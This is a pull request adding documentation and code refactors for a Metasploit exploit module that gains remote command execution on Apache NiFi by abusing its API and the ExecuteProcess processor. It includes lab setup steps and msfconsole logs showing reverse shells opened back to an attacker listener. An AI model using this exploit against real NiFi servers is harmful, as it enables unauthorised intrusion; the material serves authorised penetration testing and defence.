### PR TITLE
Add new Apache NiFi RCE exploit module

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
@@ -58,7 +58,7 @@ of a JWT can be set using the `TOKEN` option. This module does not support authe
 4. Extract the files.
 5. Generate files for TLS configuration by running `./bin/tls-toolkit.sh standalone -n "localhost"`.
 6. Copy the files that were generated in step 4 to the NiFi `conf` directory, e.g. `mv localhost/* ../nifi-1.12.0/conf/`.
-7. Generate a client certificate by running `./bin/tls-toolkit.sh standalone -C "cn=my_username, OU=NiFi"`.
+7. Generate a client certificate by running `./bin/tls-toolkit.sh standalone -C "CN=my_username, OU=NiFi"`.
 9. Copy the `.p12` and `.password` files that were generated in step 6 to the system with the browser that you will be using to access the
 NiFi web UI.
 10. Add the `.p12` client certificate to the operating system/browser. The password for the certificate is inside the `.password` text file.

--- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
@@ -1,0 +1,174 @@
+## Vulnerable Application
+
+Apache NiFi is a tool that automates the flow of data between systems. It is written in Java and allows users to configure "dataflows" using the web UI or the API. The web UI uses the API behind the scenes. According to [Wikipedia](https://en.wikipedia.org/wiki/Apache_NiFi), it is based on "NiagaraFiles", which was developed by the NSA and open-sourced in 2014. This is where the name NiFi came from.
+
+It can be downloaded from [nifi.apache.org](https://nifi.apache.org/) where source and compiled Java binaries are available that will run on Windows, Linux and MacOS. Older releases are also available and a docker image is also available from [docker hub](https://hub.docker.com/r/apache/nifi/).
+
+This exploit module uses the [ExecuteProcess](https://nifi.apache.org/docs/nifi-docs/components/org.apache.nifi/nifi-standard-nar/1.12.1/org.apache.nifi.processors.standard.ExecuteProcess/) processor, which is part of the standard processors collection that is included with NiFi. It allows OS commands to be executed, by design. Other processors that can be used to execute code/commands are also included in the standard processors collection. These processors are all [restricted components](https://nifi.apache.org/docs/nifi-docs/html/developer-guide.html#restricted). ExecuteProcess was chosen because it is relatively simple to use, does not depend on any scripting languages being installed, and is not marked as "experimental".
+
+Default configuration is to serve over plaintext HTTP and require no authentication. In this configuration it is not possible to configure any authorisation controls, therefore it is possible to interact with the application via the API without having to supply credentials.
+
+It is possible (and recommended) to configure NiFi to require authentication, either by using ssl client certificates or other 3rd party authentication mechanisms. Once Authentication is enabled, authorisation can be configured to control which features are available to a specific user account.
+
+If authentication and authorisation is enabled, the account used must have the following permissions in order to achieve remote command execution using this module:
+
+* Permission to "view" and "modify" the root controller.
+* Permmission to "access restricted components", "regardless of restrictions".
+
+If authentication is required, then the `USERNAME` and `PASSWORD` options can be used to specify credentials. Alternatively, if a more complex authentication flow is required (such as OpenId Connect), or a session token has already been obtained, a session token in the form of a JWT can be set using the `TOKEN` option. This module does not support authentication using a client certificate.
+
+### Configuring a Vulnerable Environment
+
+#### Windows
+
+1. Download the NiFi binaries zip file from [nifi.apache.org](https://nifi.apache.org/download.html).
+2. Extract the files.
+3. Start NiFi by running  `bin\run-nifi.bat`.
+4. NiFi will be available over HTTP on port 8080 (be patient, NiFi takes some time to start).
+5. Disable Windows Defender so that it doesn't block Metasploit's reverse shell payload.
+
+#### Linux/Unix
+
+##### Without Authentication
+
+1. Download the NiFi binaries tar.gz file from [nifi.apache.org](https://nifi.apache.org/download.html).
+2. Extract the files.
+3. Start NiFi by running  `./bin/nifi.sh start`.
+4. NiFi will be available over HTTP on port 8080 (be patient, NiFi takes some time to start).
+
+##### With Authentication
+
+1. Follow steps 1 to 4 above and confirm that NiFi is available on port 8080.
+3. Download the NiFi toolkit tar.gz from [nifi.apache.org.](https://nifi.apache.org/download.html)
+4. Extract the files.
+5. Generate files for TLS configuration by running `./bin/tls-toolkit.sh standalone -n "localhost"`.
+6. Copy the files that were generated in step 4 to the NiFi `conf` directory, e.g. `mv localhost/* ../nifi-1.12.0/conf/`.
+7. Generate a client certificate by running `./bin/tls-toolkit.sh standalone -C "cn=my_username, OU=NiFi"`.
+9. Copy the `.p12` and `.password` files that were generated in step 6 to the system with the browser that you will be using to access the NiFi web UI.
+10. Add the `.p12` client certificate to the operating system/browser. The password for the certificate is inside the `.password` text file.
+11. Edit the `authorizers.xml` file in the `conf` directory (what you put in this file must match **exactly** what you used in step 6, including capitalisation and whitespace):
+    1. Replace `<property name="Initial User Identity 1"></property>` in the `userGroupProvider` section with `<property name="Initial User Identity 1">CN=my_username, OU=NiFi</property>`.
+    2. Replace `<property name="Initial Admin Identity"></property>` in the `accessPolicyProvider` section with `<property name="Initial Admin Identity">CN=my_username, OU=NiFi</property>`.
+12. Restart NiFi by running  `./bin/nifi.sh restart`.
+13. NiFi will be available over HTTPS (**on the local machine only**) on port 9443 (be patient, NiFi takes some time to start).
+14. Ensure that you can access the web UI and authenticate using the client certificate. If you do not have a web browser available on the system running NiFi, you will have to forward port 9443 to that system first, e.g. `ssh -L 9443:127.0.0.1:9443 <username>@<host>`. Once authenticated, the user that you configured when generating the certificate will be displayed in the top right of the UI.
+13. Click the hamburger button in the top right and select "Users".
+14. Add a user of `cn=admin,dc=example,dc=org` (this is the user that you will authenticate with using LDAP later).
+15. In the "Operate" panel on the left of the UI, click on the key icon to configure the access policies on the root component.
+16. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to view the component.
+17. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to modify the component and close the panel.
+18. Click the hamburger button in the top right and select "Policies".
+19. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to "access restricted components", "regardless of restrictions" and close the panel.
+20. Run OpenLDAP on the system. An easy way is to run `docker run --name my-openldap -p 389:389 -p 636:636 -d osixia/openldap`. This comes preconfigured with a user of `admin` with the password `admin`
+21. Edit the `nifi.properties` file in the `conf` directory:
+    1. Replace the line `nifi.security.user.login.identity.provider=` with `nifi.security.user.login.identity.provider=ldap-provider`.
+22. Edit the `login-identity-providers.xml` file in the `conf` directory:
+    1. Uncomment the`<provider>` element containing the  `ldap-provider` settings.
+    2. Replace `<property name="Authentication Strategy">START_TLS</property>` with `<property name="Authentication Strategy">SIMPLE</property>`.
+    3. Replace `<property name="Manager DN"></property>` with `<property name="Manager DN">cn=admin,dc=example,dc=org</property>` what you put here must match **exactly** what you use in step 6, including capitalisation and whitespace.
+    4. Replace `<property name="Manager Password"></property>` with `<property name="Manager Password">admin</property>`.
+    5. Replace `<property name="Url"></property>` with `<property name="Url">ldap://127.0.0.1</property>`.
+    5. Replace `<property name="User Search Base"></property>` with `<property name="User Search Base">dc=example,dc=org</property>`.
+    5. Replace `<property name="User Search Filter"></property>` with `<property name="User Search Filter">cn={0}</property>`.
+23. Restart NiFi by running  `./bin/nifi.sh restart`.
+24. NiFi will be available over HTTPS (**on the local machine only**) on port 9443 (be patient, NiFi takes some time to start).
+25. Ensure that you can access the web UI and authenticate using the username `admin` and password of `admin`. Remember that in step 12 you may have needed to forward the port to the local machine. In order to be prompted for credentials, you must not authenticate using the certificate like you did in step 12. You may have to take steps to prevent your browser from automatically submitting the certificate, such as restarting the browser. A message will be displayed saying that you do not have permission to access the webUI. This is expected, and indicates that NiFi does recognise the account.
+
+#### Useful links
+
+[NiFi Getting Started](https://nifi.apache.org/docs/nifi-docs/html/getting-started.html) (including installation on Windows/Linux/Unix).
+
+[NiFi Walkthroughs](https://nifi.apache.org/docs/nifi-docs/html/walkthroughs.html) (including installation on Unix and enabling HTTPS).
+
+[NiFi, Authentication and Authorization](https://ijokarumawak.github.io/nifi/2016/11/15/nifi-auth/) (configuring LDAP authentication).
+
+## Verification Steps
+1. Install the application.
+1. Start msfconsole.
+1. Do: `use exploit/multi/http/apache_nifi_processor_rce`.
+1. Do: `set rhosts <ip address of NiFi host> `.
+1. Do: `set lhost <ip address of metasploit machine`.
+1. If necessary, do: `set rport <port of NiFi API>`.
+1. If necessary, do: `set ssl true`.
+1. If necessary, do: `set username <NiFi username>`.
+1. If necessary, do: `set password <NiFi password>`.
+1. If necessary, do: `set target 1` (this sets the target to Windows instead of Unix).
+1. Do: `run`.
+1. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+The base NiFi API path. Default: `/nifi-api`.
+
+### DELAY
+
+The delay in seconds before stopping and deleting the processor. This is required because the processor may not start immediately after being created. Default: `5`.
+
+### USERNAME
+
+Username to authenticate with, if necessary. Optional.
+
+### PASSWORD
+
+Password to authenticate with, if necessary. Optional.
+
+### BEARER-TOKEN
+
+JWT authenticate with, if necessary. Optional.
+
+## Scenarios
+The first target (Windows 10.0.18363 Pro) does not require authentication, however the second target (Ubuntu Server 20.04.1) does. It can be seen that it fails the first time, but succeeds after credentials are set. The version of NiFi that was installed on both platforms was 1.12.1.
+
+```
+$ msfconsole -q
+msf5 exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131
+lhost => 192.168.194.131
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set target 1
+target => 1
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 192.168.194.140
+rhost => 192.168.194.140
+msf5 exploit(multi/http/apache_nifi_processor_rce) > check
+[*] 192.168.194.140:8080 - The target appears to be vulnerable.
+msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z
+[*] Started reverse TCP handler on 192.168.194.131:4444 
+[*] Waiting 5 seconds before stopping and deleting
+[*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.140:50008) at 2020-10-03 13:17:58 +0100
+[*] Session 1 created in the background.
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set target 0
+target => 0
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set ssl true
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => true
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set rport 9443
+rport => 9443
+msf5 exploit(multi/http/apache_nifi_processor_rce) > check
+[*] 127.0.0.1:9443 - The service is running, but could not be validated.
+msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z
+[*] Started reverse TCP handler on 192.168.194.131:4444 
+[-] Exploit aborted due to failure: bad-config: Authentication is required. Bearer-Token or Username and Password must be specified
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set password admin
+password => admin
+msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z
+[*] Started reverse TCP handler on 192.168.194.131:4444 
+[*] Waiting 5 seconds before stopping and deleting
+[*] Command shell session 2 opened (192.168.194.131:4444 -> 192.168.194.130:50802) at 2020-10-03 13:18:00 +0100
+[*] Session 2 created in the background.
+msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type               Information                                                                       Connection
+  --  ----  ----               -----------                                                                       ----------
+  1         shell cmd/windows  Microsoft Windows [Version 10.0.18363.1082] (c) 2019 Microsoft Corporation. A...  192.168.194.131:4444 -> 192.168.194.140:50008 (192.168.194.140)
+  2         shell cmd/unix                                                                                       192.168.194.131:4444 -> 192.168.194.130:50802 (127.0.0.1)
+```

--- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
@@ -149,9 +149,10 @@ Password to authenticate with, if necessary. Optional.
 JWT authenticate with, if necessary. Optional.
 
 ## Scenarios
-The first target (Windows 10.0.18363 Pro) does not require authentication, however the second target (Ubuntu Server 20.04.1) does. It can be
-seen that it fails the first time, but succeeds after credentials are set. The version of NiFi that was installed on both platforms was
-1.12.1.
+
+The version of NiFi that was installed on both platforms was 1.12.1.
+
+### Windows 10.0.18363 Pro (no authentication required)
 
 ```
 $ msfconsole -q
@@ -170,8 +171,26 @@ msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z
 [*] Waiting 5 seconds before stopping and deleting
 [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.140:50008) at 2020-10-03 13:17:58 +0100
 [*] Session 1 created in the background.
-msf5 exploit(multi/http/apache_nifi_processor_rce) > set target 0
-target => 0
+msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type               Information                                                                       Connection
+  --  ----  ----               -----------                                                                       ----------
+  1         shell cmd/windows  Microsoft Windows [Version 10.0.18363.1082] (c) 2019 Microsoft Corporation. A...  192.168.194.131:4444 -> 192.168.194.140:50008 (192.168.194.140)
+```
+
+### Ubuntu Server 20.04.1 (authentication required)
+
+It can be seen that it fails the first time because authentication is required, but succeeds after credentials are set.
+
+```
+$ msfconsole -q
+msf5 exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf5 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131
+lhost => 192.168.194.131
 msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 127.0.0.1
 rhost => 127.0.0.1
 msf5 exploit(multi/http/apache_nifi_processor_rce) > set ssl true
@@ -192,8 +211,8 @@ password => admin
 msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z
 [*] Started reverse TCP handler on 192.168.194.131:4444 
 [*] Waiting 5 seconds before stopping and deleting
-[*] Command shell session 2 opened (192.168.194.131:4444 -> 192.168.194.130:50802) at 2020-10-03 13:18:00 +0100
-[*] Session 2 created in the background.
+[*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:50802) at 2020-10-03 13:18:00 +0100
+[*] Session 1 created in the background.
 msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions
 
 Active sessions
@@ -201,7 +220,6 @@ Active sessions
 
   Id  Name  Type               Information                                                                       Connection
   --  ----  ----               -----------                                                                       ----------
-  1         shell cmd/windows  Microsoft Windows [Version 10.0.18363.1082] (c) 2019 Microsoft Corporation. A...  192.168.194.131:4444 -> 192.168.194.140:50008 (192.168.194.140)
-  2         shell cmd/unix                                                                                       192.168.194.131:4444 -> 192.168.194.130:50802 (127.0.0.1)
+  1         shell cmd/unix                                                                                       192.168.194.131:4444 -> 192.168.194.130:50802 (127.0.0.1)
 ```
 

--- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
@@ -1,21 +1,36 @@
 ## Vulnerable Application
 
-Apache NiFi is a tool that automates the flow of data between systems. It is written in Java and allows users to configure "dataflows" using the web UI or the API. The web UI uses the API behind the scenes. According to [Wikipedia](https://en.wikipedia.org/wiki/Apache_NiFi), it is based on "NiagaraFiles", which was developed by the NSA and open-sourced in 2014. This is where the name NiFi came from.
+Apache NiFi is a tool that automates the flow of data between systems. It is written in Java and allows users to configure "dataflows" using
+the web UI or the API. The web UI uses the API behind the scenes. According to [Wikipedia](https://en.wikipedia.org/wiki/Apache_NiFi), it is
+based on "NiagaraFiles", which was developed by the NSA and open-sourced in 2014. This is where the name NiFi came from.
 
-It can be downloaded from [nifi.apache.org](https://nifi.apache.org/) where source and compiled Java binaries are available that will run on Windows, Linux and MacOS. Older releases are also available and a docker image is also available from [docker hub](https://hub.docker.com/r/apache/nifi/).
+It can be downloaded from [nifi.apache.org](https://nifi.apache.org/) where source and compiled Java binaries are available that will run on
+Windows, Linux and MacOS. Older releases are also available and a docker image is also available from
+[docker hub](https://hub.docker.com/r/apache/nifi/).
 
-This exploit module uses the [ExecuteProcess](https://nifi.apache.org/docs/nifi-docs/components/org.apache.nifi/nifi-standard-nar/1.12.1/org.apache.nifi.processors.standard.ExecuteProcess/) processor, which is part of the standard processors collection that is included with NiFi. It allows OS commands to be executed, by design. Other processors that can be used to execute code/commands are also included in the standard processors collection. These processors are all [restricted components](https://nifi.apache.org/docs/nifi-docs/html/developer-guide.html#restricted). ExecuteProcess was chosen because it is relatively simple to use, does not depend on any scripting languages being installed, and is not marked as "experimental".
+This exploit module uses the
+[ExecuteProcess](https://nifi.apache.org/docs/nifi-docs/components/org.apache.nifi/nifi-standard-nar/1.12.1/org.apache.nifi.processors.standard.ExecuteProcess/)
+processor, which is part of the standard processors collection that is included with NiFi. It allows OS commands to be executed, by design.
+Other processors that can be used to execute code/commands are also included in the standard processors collection. These processors are all
+[restricted components](https://nifi.apache.org/docs/nifi-docs/html/developer-guide.html#restricted). ExecuteProcess was chosen because it
+is relatively simple to use, does not depend on any scripting languages being installed, and is not marked as "experimental".
 
-Default configuration is to serve over plaintext HTTP and require no authentication. In this configuration it is not possible to configure any authorisation controls, therefore it is possible to interact with the application via the API without having to supply credentials.
+Default configuration is to serve over plaintext HTTP and require no authentication. In this configuration it is not possible to configure
+any authorisation controls, therefore it is possible to interact with the application via the API without having to supply credentials.
 
-It is possible (and recommended) to configure NiFi to require authentication, either by using ssl client certificates or other 3rd party authentication mechanisms. Once Authentication is enabled, authorisation can be configured to control which features are available to a specific user account.
+It is possible (and recommended) to configure NiFi to require authentication, either by using ssl client certificates or other 3rd party
+authentication mechanisms. Once Authentication is enabled, authorisation can be configured to control which features are available to a
+specific user account.
 
-If authentication and authorisation is enabled, the account used must have the following permissions in order to achieve remote command execution using this module:
+If authentication and authorisation is enabled, the account used must have the following permissions in order to achieve remote command
+execution using this module:
 
 * Permission to "view" and "modify" the root controller.
 * Permmission to "access restricted components", "regardless of restrictions".
 
-If authentication is required, then the `USERNAME` and `PASSWORD` options can be used to specify credentials. Alternatively, if a more complex authentication flow is required (such as OpenId Connect), or a session token has already been obtained, a session token in the form of a JWT can be set using the `TOKEN` option. This module does not support authentication using a client certificate.
+If authentication is required, then the `USERNAME` and `PASSWORD` options can be used to specify credentials. Alternatively, if a more
+complex authentication flow is required (such as OpenId Connect), or a session token has already been obtained, a session token in the form
+of a JWT can be set using the `TOKEN` option. This module does not support authentication using a client certificate.
 
 ### Configuring a Vulnerable Environment
 
@@ -44,35 +59,49 @@ If authentication is required, then the `USERNAME` and `PASSWORD` options can be
 5. Generate files for TLS configuration by running `./bin/tls-toolkit.sh standalone -n "localhost"`.
 6. Copy the files that were generated in step 4 to the NiFi `conf` directory, e.g. `mv localhost/* ../nifi-1.12.0/conf/`.
 7. Generate a client certificate by running `./bin/tls-toolkit.sh standalone -C "cn=my_username, OU=NiFi"`.
-9. Copy the `.p12` and `.password` files that were generated in step 6 to the system with the browser that you will be using to access the NiFi web UI.
+9. Copy the `.p12` and `.password` files that were generated in step 6 to the system with the browser that you will be using to access the
+NiFi web UI.
 10. Add the `.p12` client certificate to the operating system/browser. The password for the certificate is inside the `.password` text file.
-11. Edit the `authorizers.xml` file in the `conf` directory (what you put in this file must match **exactly** what you used in step 6, including capitalisation and whitespace):
-    1. Replace `<property name="Initial User Identity 1"></property>` in the `userGroupProvider` section with `<property name="Initial User Identity 1">CN=my_username, OU=NiFi</property>`.
-    2. Replace `<property name="Initial Admin Identity"></property>` in the `accessPolicyProvider` section with `<property name="Initial Admin Identity">CN=my_username, OU=NiFi</property>`.
+11. Edit the `authorizers.xml` file in the `conf` directory (what you put in this file must match **exactly** what you used in step 6,
+    including capitalisation and whitespace):
+    1. Replace `<property name="Initial User Identity 1"></property>` in the `userGroupProvider` section with `<property name="Initial User
+       Identity 1">CN=my_username, OU=NiFi</property>`.
+    2. Replace `<property name="Initial Admin Identity"></property>` in the `accessPolicyProvider` section with `<property name="Initial
+       Admin Identity">CN=my_username, OU=NiFi</property>`.
 12. Restart NiFi by running  `./bin/nifi.sh restart`.
 13. NiFi will be available over HTTPS (**on the local machine only**) on port 9443 (be patient, NiFi takes some time to start).
-14. Ensure that you can access the web UI and authenticate using the client certificate. If you do not have a web browser available on the system running NiFi, you will have to forward port 9443 to that system first, e.g. `ssh -L 9443:127.0.0.1:9443 <username>@<host>`. Once authenticated, the user that you configured when generating the certificate will be displayed in the top right of the UI.
+14. Ensure that you can access the web UI and authenticate using the client certificate. If you do not have a web browser available on the
+    system running NiFi, you will have to forward port 9443 to that system first, e.g. `ssh -L 9443:127.0.0.1:9443 <username>@<host>`. Once
+    authenticated, the user that you configured when generating the certificate will be displayed in the top right of the UI.
 13. Click the hamburger button in the top right and select "Users".
 14. Add a user of `cn=admin,dc=example,dc=org` (this is the user that you will authenticate with using LDAP later).
 15. In the "Operate" panel on the left of the UI, click on the key icon to configure the access policies on the root component.
 16. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to view the component.
 17. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to modify the component and close the panel.
 18. Click the hamburger button in the top right and select "Policies".
-19. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to "access restricted components", "regardless of restrictions" and close the panel.
-20. Run OpenLDAP on the system. An easy way is to run `docker run --name my-openldap -p 389:389 -p 636:636 -d osixia/openldap`. This comes preconfigured with a user of `admin` with the password `admin`
+19. Give the `cn=admin,dc=example,dc=org` user that was added in step 14 permission to "access restricted components", "regardless of
+    restrictions" and close the panel.
+20. Run OpenLDAP on the system. An easy way is to run `docker run --name my-openldap -p 389:389 -p 636:636 -d osixia/openldap`. This comes
+    preconfigured with a user of `admin` with the password `admin`
 21. Edit the `nifi.properties` file in the `conf` directory:
     1. Replace the line `nifi.security.user.login.identity.provider=` with `nifi.security.user.login.identity.provider=ldap-provider`.
 22. Edit the `login-identity-providers.xml` file in the `conf` directory:
     1. Uncomment the`<provider>` element containing the  `ldap-provider` settings.
-    2. Replace `<property name="Authentication Strategy">START_TLS</property>` with `<property name="Authentication Strategy">SIMPLE</property>`.
-    3. Replace `<property name="Manager DN"></property>` with `<property name="Manager DN">cn=admin,dc=example,dc=org</property>` what you put here must match **exactly** what you use in step 6, including capitalisation and whitespace.
+    2. Replace `<property name="Authentication Strategy">START_TLS</property>` with
+       `<property name="Authentication Strategy">SIMPLE</property>`.
+    3. Replace `<property name="Manager DN"></property>` with `<property name="Manager DN">cn=admin,dc=example,dc=org</property>` what you
+       put here must match **exactly** what you use in step 6, including capitalisation and whitespace.
     4. Replace `<property name="Manager Password"></property>` with `<property name="Manager Password">admin</property>`.
     5. Replace `<property name="Url"></property>` with `<property name="Url">ldap://127.0.0.1</property>`.
     5. Replace `<property name="User Search Base"></property>` with `<property name="User Search Base">dc=example,dc=org</property>`.
     5. Replace `<property name="User Search Filter"></property>` with `<property name="User Search Filter">cn={0}</property>`.
 23. Restart NiFi by running  `./bin/nifi.sh restart`.
 24. NiFi will be available over HTTPS (**on the local machine only**) on port 9443 (be patient, NiFi takes some time to start).
-25. Ensure that you can access the web UI and authenticate using the username `admin` and password of `admin`. Remember that in step 12 you may have needed to forward the port to the local machine. In order to be prompted for credentials, you must not authenticate using the certificate like you did in step 12. You may have to take steps to prevent your browser from automatically submitting the certificate, such as restarting the browser. A message will be displayed saying that you do not have permission to access the webUI. This is expected, and indicates that NiFi does recognise the account.
+25. Ensure that you can access the web UI and authenticate using the username `admin` and password of `admin`. Remember that in step 12 you
+    may have needed to forward the port to the local machine. In order to be prompted for credentials, you must not authenticate using the
+    certificate like you did in step 12. You may have to take steps to prevent your browser from automatically submitting the certificate,
+    such as restarting the browser. A message will be displayed saying that you do not have permission to access the webUI. This is
+    expected, and indicates that NiFi does recognise the account.
 
 #### Useful links
 
@@ -104,7 +133,8 @@ The base NiFi API path. Default: `/nifi-api`.
 
 ### DELAY
 
-The delay in seconds before stopping and deleting the processor. This is required because the processor may not start immediately after being created. Default: `5`.
+The delay in seconds before stopping and deleting the processor. This is required because the processor may not start immediately after
+being created. Default: `5`.
 
 ### USERNAME
 
@@ -119,7 +149,9 @@ Password to authenticate with, if necessary. Optional.
 JWT authenticate with, if necessary. Optional.
 
 ## Scenarios
-The first target (Windows 10.0.18363 Pro) does not require authentication, however the second target (Ubuntu Server 20.04.1) does. It can be seen that it fails the first time, but succeeds after credentials are set. The version of NiFi that was installed on both platforms was 1.12.1.
+The first target (Windows 10.0.18363 Pro) does not require authentication, however the second target (Ubuntu Server 20.04.1) does. It can be
+seen that it fails the first time, but succeeds after credentials are set. The version of NiFi that was installed on both platforms was
+1.12.1.
 
 ```
 $ msfconsole -q
@@ -172,3 +204,4 @@ Active sessions
   1         shell cmd/windows  Microsoft Windows [Version 10.0.18363.1082] (c) 2019 Microsoft Corporation. A...  192.168.194.131:4444 -> 192.168.194.140:50008 (192.168.194.140)
   2         shell cmd/unix                                                                                       192.168.194.131:4444 -> 192.168.194.130:50802 (127.0.0.1)
 ```
+

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -249,10 +249,10 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::BadConfig,
                   'Authentication is required. Bearer-Token or Username and Password must be specified')
       end
-      @token = if !datastore['BEARER-TOKEN'].to_s.empty?
-                 datastore['BEARER-TOKEN']
-               else
+      @token = if datastore['BEARER-TOKEN'].to_s.empty?
                  retrieve_token
+               else
+                 datastore['BEARER-TOKEN']
                end
     else
       @token = false

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -113,8 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
              'data' => body.to_json }
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    processor = check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
-    processor
+    check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
   end
 
   def configure_processor(command)

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -212,8 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     check_response('POSTing credentials', response, 201)
-    token = response.body
-    token
+    response.body
   end
 
   def cleanup

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -5,7 +7,6 @@
 
 # Potential Improvements:
 # Add option to authenticate using client certificate
-# Add a documentation (markdown?)
 # Add a scanner module?
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -18,13 +19,10 @@ class MetasploitModule < Msf::Exploit::Remote
       info,
       'Name' => 'Apache NiFi API Remote Code Execution',
       'Description' => '
-        This module uses the NiFi API to create an ExecuteProcess processor
-        that will execute OS commands. The API must be unsecured (or
-        credentials provided) and the ExecuteProcess processor must be
-        available. An ExecuteProcessor processor is created then is
-        configured with the payload and started. The processor is then
-        stopped and deleted.
-      ',
+        This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must
+        be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor
+        processor is created then is configured with the payload and started. The processor is then stopped and
+        deleted.',
       'License' => MSF_LICENSE,
       'Author' => ['Graeme Robinson'],
       'References' => [
@@ -73,13 +71,9 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [false, 'Username to authenticate with']),
         OptString.new('PASSWORD', [false, 'Password to authenticate with']),
         OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']),
-        OptInt.new(
-          'DELAY', [
-            true,
-            'The delay (s) before stopping and deleting the processor',
-            5 # 2 seems enough in my lab, but set to 5 for safety
-          ]
-        )
+        OptInt.new('DELAY', [true,
+                             'The delay (s) before stopping and deleting the processor',
+                             5]) # 2 seems enough in my lab, but set to 5 for safety
       ],
       self.class
     )
@@ -87,103 +81,65 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check_response(description, response, expected_response_code, item = '')
     # Check that response was received
-    if !response
-      fail_with(Failure::Unreachable,
-                'Unable to retrieve HTTP response from' \
-                " API when #{description}")
-    # Check that response code was expected
-    elsif response.code != expected_response_code
+    unless response
+      fail_with(Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}")
+      # Check that response code was expected
+    end
+    if response.code != expected_response_code
       fail_with(Failure::UnexpectedReply,
-                'Unexpected HTTP response code from API when ' \
-                "#{description} (received #{response.code}, " \
-                "expected #{expected_response_code})")
+                # Do I need this line escape?
+                "Unexpected HTTP response code from API when #{description} " \
+                "(received #{response.code}, expected #{expected_response_code})")
     end
     # Check that item can be retrieved
     return if item.empty?
 
     body = response.get_json_document
     unless body.key?(item)
-      fail_with(Failure::UnexpectedReply,
-                "Unable to retrieve #{item} from HTTP" \
-                " response when #{description}")
+      fail_with(Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}")
     end
     body[item]
   end
 
   def supports_login
-    response = send_request_cgi(
-      { 'method' => 'GET',
-        'uri' => normalize_uri(
-          target_uri.path, 'access', 'config'
-        ) }
-    )
-    config = check_response(
-      'GETting access configuration', response, 200, 'config'
-    )
+    response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
+    config = check_response('GETting access configuration', response, 200, 'config')
     config['supportsLogin']
   end
 
   def get_process_group(token)
-    opts = {
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'process-groups', 'root')
-    }
+    opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') }
